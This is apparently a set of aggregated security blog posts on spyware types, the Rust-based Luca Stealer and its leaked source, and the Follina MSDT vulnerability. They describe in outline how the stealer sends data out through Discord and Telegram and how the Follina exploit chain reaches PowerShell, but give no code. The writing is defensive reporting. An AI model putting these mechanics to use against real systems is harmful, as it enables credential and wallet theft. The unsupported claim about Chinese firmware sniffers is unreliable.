Browser hijackers can modify your browser settings and redirect you to fraudulent websites you did not request. Although this type of malware has more common details with adware, it may also contain spyware components. Browsers hold a lot of personal information about you, thus hackers will likely find something valuable. Cookies, in particular, can give out your login credentials and choices on different sites. All this data is usually sold to third parties, or used for phishing attacks by same threat actors.

Packet sniffer

With a packet sniffer, cybercriminals can connect to a network and obtain all traffic passing through it. A hacker can gain access to login credentials and financial data by tracking Internet usage, including email and instant messages. That’s why sniffers can be dangerous, especially on unsecured Wi-Fi networks. Hackers can sniff unsecured public Wi-Fi networks, intercepting the traffic of anyone using them. Moreover, sniffers are sometimes present in the basic firmware of the network device – a widespread practice among Chinese manufacturers.

Commercial Spyware

Some companies sell spyware that you can intentionally put on your devices. For example, parents can use it to protect their children on the Internet. This type of software is known as parental controls. In addition, some companies use spyware to monitor employees. Although this is not illegal, such software also fits the definition of spyware.

How can I get infected with spyware?

There are different ways to get infected with spyware. Here are some of the most common:

• Clicking on a pop-up window or tooltip without reading what it says
• Opening email attachments from unknown senders
• Downloading pirated movies, music, or games
• Downloading legitimate files bundled with malware

What should I do if my system is infected with spyware?

So, if you think spyware has infiltrated your device, install a powerful antivirus application. Then, manually run an update to ensure that your antivirus contains the latest virus databases and run a full scan. Suppose, for some reason the malware doesn’t allow you to install antivirus software or run a scan. Then you can scan your computer with an aggressive, clean-only tool such as Trojan Killer. Finally, check your defenses once you’ve dealt with the immediate problem. Ensure that your antivirus is fully working and its bases are up to date.

The post Spyware Attack: Red Flags You’re Dealing With Spyware appeared first on Gridinsoft Blog.

Luca Stealer functionality

As analysts from Cyble state in their report, the set of functions Luca malware offers is similar to the ones available in other stealers. It can successfully break into all Chromium-based web browsers, and deliver different types of information to the hacker. In particular, it aims for cookie files, Discord login tokens, accounts on game distribution platforms, credit card info and cryptocurrency wallets. The last two categories of information are obtained through digging the extensions installed in the browser. Malware checks them by the list of installed plugins and, once getting a match, steals the data these plugins store locally. This technique is different from what is usually applied by stealers.

Besides the categories of data I have mentioned before, Luca Stealer also grabs the information about the attacked system. Using the specific calls, it receives the system memory amount, swap file size, number of CPU cores and so on. After finishing the data collection, Luca packs it into the zip archive and sends it via Discord webhooks, or through bots in Telegram. The choice depends on the size of the resulting file.

There is a single significant difference between Luca and other stealers. It is not able to hijack the cryptocurrency transactions through editing the data copied to clipboard. Still, that function is highly notable for antivirus software. Reading the clipboard contents without the user’s command is suspicious, so the absence of this function makes this malware harder to detect. Moreover, stealing the entire wallet instead of the single transaction may be much more profitable, and the former has more chances to remain undetected.

Luca stealer spreading

It is not clear how exactly this stealer spread. Luca is quite stealthy, as only each fifth antimalware vendor among present on VirusTotal actually detects it. It is likely caused by the programming language of this malware – Rust. It has already appeared in ALPHV/BlackCat ransomware, and showed up as the great way to mask the malware. Additionally, that makes it easier for the crooks to make their malware cross-platform. Usual ways of stealer distribution – through the malicious spamming on different platforms and phishing – will fit Luca as well. But which one will the cybercriminals actually opt for – only God knows.

A few days ago an individual on XSS leaked [sic](shared?) the source code to a Rust-based data theft malware.

We have added it to the vx-underground Malware Source Code collection on GitHub:

/Leaks/Win32/Win32.Rust.LucaStealerhttps://t.co/5RHeEYWYth

— vx-underground (@vxunderground) July 26, 2022

Is there a reason to be concerned?

There is always a reason to be concerned, if you have anything valuable in a digital form. Cryptocurrencies prices are going up, and so do the hackers’ interest to someones’ savings in crypto. The full-scale pandemic of cryptostealers is already gone, but that makes each new stealer with the ability to dig into crypto wallets even more hazardous. Such programs now cannot just rely on an increased demand on the black market. They should offer something ridiculous – or will definitely fail. There are already around 25 cases of Luca Stealer usage in the wild. Not pretty impressive – but still a lot for a newbie that appeared several days ago.

It is recommended to keep all login information in a separate application, rather than in the web browser. But it will be much better to avoid the infection at all by following the rules of cybersecurity. It is better to make the situation less possible, but never deny the probability of such an unpleasant case.

The post Luca Stealer Source Code Published In The Darknet appeared first on Gridinsoft Blog.

Understanding the Follina Vulnerability

On May 27, 2022, the public became aware of a remote code execution (RCE) vulnerability, known as Follina. Soon after its disclosure, experts observed several instances of exploitation.

Follina (CVE-2022-30190) is a vulnerability identified in the Microsoft Support Diagnostic Tool (MSDT), enabling RCE on all susceptible systems. The exploitation occurs via the ms-msdt protocol handler scheme.

To exploit Follina successfully, threat actors don’t require the use of macros to entice victims. Instead, they deploy a specially crafted Word Document.

This document, through Word’s template feature, downloads and loads a malicious HTML file. Consequently, threat actors gain the ability to execute PowerShell code within targeted Windows systems.

Microsoft has issued multiple workarounds and advisories to mitigate the vulnerability’s risk.

Functioning of the Follina Vulnerability

Upon the dissemination of this vulnerability’s details online, threat actors eagerly commenced the installation of their payloads.

For a successful Follina exploit, threat actors employ HTML documents executed under WinWord. The execution initiates the msdt.exe process as a child process.

Registry protocol handler entry enables these processes. Subsequently, Sdiagnhost.exe gets activated, the Scripted Diagnostics Native Host that facilitates the creation of the final payload—in Follina’s case, PowerShell.

AsyncRAT and Browser Infostealer via Follina Vulnerability

It has been observed that threat actors deployed a diverse range of payloads in successful exploitation instances. One instance involved deploying the remote access Trojan AsyncRAT, complete with a valid digital signature.

Upon execution, this trojan verifies the presence of antivirus software. However, its primary function is to gather various system information, such as operating system details, executed paths, usernames, hardware identification, and transmit it to a command-and-control (C&C) server.

Once its task is complete, the malware awaits further commands from the C&C server and executes them on the compromised system.

Another payload instance was a browser infostealer, targeting various browser data such as saved login credentials and cookies from browsers like Edge, Chrome, and Firefox.

Patching the Follina Vulnerability

While most exploits of the vulnerability occur through malicious documents, researchers have discovered alternative methods enabling successful Follina exploitation, including manipulation of HTML content in network traffic.

“While the malicious document approach is highly concerning, the less documented methods by which the exploit can be triggered are troubling until patched,” said Tom Hegel, senior threat researcher at security firm SentinelOne. “I would expect opportunistic and targeted threat actors to use this vulnerability in a variety of ways when the option is available—it’s just too easy.”

The Follina flaw was initially noticed in August 2020 by an undergraduate researcher and reported to Microsoft on April 21. The company has proposed mitigations, including using Microsoft Defender Antivirus for monitoring and blocking exploitation and disabling a specific protocol within the Support Diagnostic Tool.

Microsoft acknowledged that the vulnerability has been exploited and has already patched the issue. However, the company is yet to classify the vulnerability as a ‘zero-day’ or previously unknown vulnerability.

APT actors utilizing the vulnerability

More alarmingly, the Follina vulnerability has been observed as part of longer infection chains. For example, security firm Proofpoint observed Chinese APT actor TA413 sending malicious URLs disguised as emails from the Central Tibetan Administration.

The vulnerability has been employed at different stages in threat actor infection chains, depending on the tactics and toolkits used.

It has been used against numerous targets in Nepal, Belarus, the Philippines, India, and Russia. Proofpoint’s vice president of threat research, Sherrod DeGrippo, identified multiple instances of vulnerability exploitation within phishing campaigns.

The vulnerability affects all supported Windows versions, Office ProPlus, Office 2021, Office 2013 through 2019, and Microsoft Office 365, receiving a 7.8 CVSS score.

Government workers impacted by the vulnerability

In addition to targeting various entities across different countries, specialists report attacks on government workers leveraging this vulnerability.

State-sponsored hackers attempted to exploit the Follina vulnerability in Microsoft Office against U.S. and E.U government targets through a phishing campaign.

So far researchers have not identified which government was behind an attack.

Malicious emails of the phishing campaign contained alluring texts promising in fake recruitment pitches 20 percent boost in salary. To learn more recipients were urged to open an accompanying email attachment.

Sherrod DeGrippo, vice president of threat research at Proofpoint in Twitter tweeted about the similar incident where about 10 company’s customers received over 1,000 messages with the same text.

The post Attackers Exploit MSDT Follina Bug to Drop RAT appeared first on Gridinsoft Blog.